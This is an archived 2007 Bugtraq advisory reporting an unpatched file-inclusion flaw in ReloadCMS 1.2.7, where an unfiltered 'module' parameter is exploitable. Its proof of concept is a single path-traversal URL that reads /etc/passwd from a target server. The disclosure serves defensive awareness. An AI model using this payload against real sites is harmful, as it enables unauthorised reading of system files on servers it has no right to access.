| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071020142720.655.qmail@securityfocus.com>
Date: 20 Oct 2007 14:27:20 -0000
From: sekuru@...il.ua
To: bugtraq@...urityfocus.com
Subject: ReloadCMS Vulnerable
New Advisory:
ReloadCMS
http://reloadcms.com
——————–Summary—————-
Software: ReloadCMS
Sowtware’s Web Site: http://reloadcms.com/main/
Versions: 1.2.7
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
PoC/Exploit: Available
Solution: Not Available
Discovered by: http://reloadcms.com
Php include bug
—————–Description—————
vulnerable mosule system.php, parameter GET['module'] is not properly filtered
————–PoC/Exploit———————-
http://site.url/index.php?module=../../../../etc/passwd
————–Solution———————
No Patch available.
————–Credit———————–
Discovered by: http://reloadcms.com
Powered by blists - more mailing lists